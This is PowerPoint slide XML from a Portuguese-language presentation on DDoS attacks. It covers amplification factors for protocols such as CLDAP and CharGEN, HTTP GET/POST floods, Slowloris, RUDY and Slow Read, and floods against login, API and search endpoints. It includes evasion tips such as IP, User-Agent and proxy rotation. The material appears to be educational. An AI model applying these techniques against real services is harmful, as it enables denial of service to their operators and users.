        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="5314950"/>
            <a:ext cx="1266816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1" name="Text 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="5372100"/>
            <a:ext cx="1223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CLDAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Text 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="5572125"/>
            <a:ext cx="122395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~50-70x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6124566" y="5314950"/>
            <a:ext cx="1266816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4" name="Text 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6181716" y="5372100"/>
            <a:ext cx="1223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ARMS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Text 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6181716" y="5572125"/>
            <a:ext cx="122395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~35-60x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7477106" y="5314950"/>
            <a:ext cx="1266816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7" name="Text 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7534256" y="5372100"/>
            <a:ext cx="1223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CharGEN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Text 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7534256" y="5572125"/>
            <a:ext cx="122395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Fator: ~10-20x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Shape 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="720090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10" name="Text 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="728662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11" name="Text 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413412" y="728662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5/14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57096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Tipos de Ataques: Camada de Aplicação (L7)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sofisticados que visam esgotar recursos de aplicações web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93056"/>
            <a:ext cx="56675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Objetivo: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57225" y="1593056"/>
            <a:ext cx="777786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Esgotar recursos específicos da aplicação (CPU, memória, conexões de banco de dados) através de requisições aparentemente legítimas na camada 7 (Aplicação). Mais difíceis de detectar por se assemelharem ao tráfego normal.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="2200275"/>
            <a:ext cx="4200525" cy="5713214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428625" y="2343150"/>
            <a:ext cx="350044" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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428875"/>
            <a:ext cx="178594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64394" y="2343150"/>
            <a:ext cx="8703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 Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720472" y="2364581"/>
            <a:ext cx="642938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1720472" y="2364581"/>
            <a:ext cx="71437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HTTP/HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864394" y="2571750"/>
            <a:ext cx="224676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Inundação com requisições HTTP GET ou POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="2800350"/>
            <a:ext cx="35861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um grande número de requisições HTTP aparentemente legítimas. Cada requisição força o servidor a alocar recursos para processá-la (ler arquivos, executar scripts, consultar bancos de dados).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828675" y="3571875"/>
            <a:ext cx="1714500" cy="1268016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914400" y="365760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 GET Flood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914400" y="3886200"/>
            <a:ext cx="161448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Solicita arquivos grandes ou páginas que exigem processamento intensivo no servidor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4500563"/>
            <a:ext cx="1211786" cy="273248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26" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4500563"/>
            <a:ext cx="1283224" cy="273248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="34036" tIns="34036" rIns="34036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GET /arquivo_grande.pdf HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2628900" y="3571875"/>
            <a:ext cx="1714500" cy="1268016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2714625" y="365760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 POST Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="3886200"/>
            <a:ext cx="161448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dados para processamento no servidor, como formulários ou uploads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="4357688"/>
            <a:ext cx="1497564" cy="153591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1" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="4357688"/>
            <a:ext cx="1569002" cy="153591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="34036" tIns="34036" rIns="34036" bIns="34036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POST /processar.php HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="4925616"/>
            <a:ext cx="3514725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33" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5011341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Técnicas Avançadas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3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257800"/>
            <a:ext cx="50006" cy="100013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1021556" y="5254228"/>
            <a:ext cx="273427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Rotação de IPs e User-Agents para parecer tráfego legítimo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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429250"/>
            <a:ext cx="50006" cy="100013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1021556" y="5425678"/>
            <a:ext cx="220627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Navegação em múltiplas páginas seguindo links</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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600700"/>
            <a:ext cx="50006" cy="100013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1021556" y="5597128"/>
            <a:ext cx="226180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Uso de proxies para distribuir a origem do ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="2200275"/>
            <a:ext cx="4200525" cy="5713214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1" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="2343150"/>
            <a:ext cx="278606" cy="34290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2428875"/>
            <a:ext cx="107156" cy="142875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5164931" y="2343150"/>
            <a:ext cx="13575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Slow Rate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508235" y="2364581"/>
            <a:ext cx="642938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45" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508235" y="2364581"/>
            <a:ext cx="71437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HTTP/HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164931" y="2571750"/>
            <a:ext cx="205767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Também conhecidos como "Low and Slow"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200650" y="2800350"/>
            <a:ext cx="35861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 vez de força bruta, estes ataques mantêm conexões abertas pelo maior tempo possível, consumindo lentamente todos os slots de conexão disponíveis no servidor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200650" y="3400425"/>
            <a:ext cx="3514725" cy="1455539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49" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="3486150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Slowloris</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="3686175"/>
            <a:ext cx="34147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cabeçalhos HTTP parciais muito lentamente, mantendo a conexão aberta enquanto espera pelo restante do cabeçalho.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="4029075"/>
            <a:ext cx="7572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Conexão:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="4157663"/>
            <a:ext cx="1337528" cy="632222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53" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="4186238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GET / HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="4305895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Host: alvo.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="4425553"/>
            <a:ext cx="1408965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User-Agent: Mozilla/5.0...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="4545211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[pausa longa]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="4664869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Accept: text/html...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200650" y="4970264"/>
            <a:ext cx="3514725" cy="1335881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59" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="5055989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R-U-Dead-Yet (RUDY) / Slow POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="5256014"/>
            <a:ext cx="34147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dados de formulário HTTP POST em pacotes minúsculos e com grandes intervalos.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="5598914"/>
            <a:ext cx="7572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Envio de dados:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="5727502"/>
            <a:ext cx="1057442" cy="51256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63" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="5756077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Content-Length: 1000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="5875734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[envia 1 byte]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="5995392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[pausa longa]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="611505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[envia 1 byte]...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200650" y="6420445"/>
            <a:ext cx="3514725" cy="1335881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68" name="Text 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="6506170"/>
            <a:ext cx="3414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Slow Read</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="6706195"/>
            <a:ext cx="34147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uma requisição HTTP válida, mas lê a resposta do servidor muito lentamente (byte a byte).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="7049095"/>
            <a:ext cx="75723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Leitura:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Shape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="7177683"/>
            <a:ext cx="954556" cy="512564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72" name="Text 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314950" y="7206258"/>
            <a:ext cx="99741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TCP Window: 1 byte</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="7325916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[lê 1 byte]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="7445573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[pausa longa]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Text 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="7565231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[lê 1 byte]...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8070652"/>
            <a:ext cx="8572500" cy="18716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7" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="8213527"/>
            <a:ext cx="350044" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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7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8299252"/>
            <a:ext cx="178594" cy="142875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864394" y="8213527"/>
            <a:ext cx="27973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a APIs e Endpoints Específicos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Shape 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647470" y="8234958"/>
            <a:ext cx="642938" cy="157163"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3182CE">
              <a:alpha val="30000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Text 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647470" y="8234958"/>
            <a:ext cx="71437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HTTP/HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Text 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864394" y="8442127"/>
            <a:ext cx="34974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direcionados a funcionalidades específicas da aplicação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="8670727"/>
            <a:ext cx="79581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Estes ataques visam endpoints específicos que consomem recursos de forma desproporcional, como APIs, páginas de login ou funções de busca.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="8956477"/>
            <a:ext cx="2552691" cy="8286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5" name="Text 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="9042202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a Login</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Text 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="9270802"/>
            <a:ext cx="245267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Inunda páginas de autenticação, forçando verificações de credenciais que consomem CPU e acessos ao banco de dados.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3495666" y="8956477"/>
            <a:ext cx="2552691" cy="8286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88" name="Text 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581391" y="9042202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a APIs REST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Text 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581391" y="9270802"/>
            <a:ext cx="245267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Visa endpoints que realizam operações intensivas como consultas complexas ou processamento de dados.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6162656" y="8956477"/>
            <a:ext cx="2552719" cy="8286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91" name="Text 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248381" y="9042202"/>
            <a:ext cx="24527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a Buscas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248381" y="9270802"/>
            <a:ext cx="2452706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 funções de busca que exigem varreduras completas de banco de dados ou processamento intensivo.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10213777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94" name="Text 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="10299502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95" name="Text 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
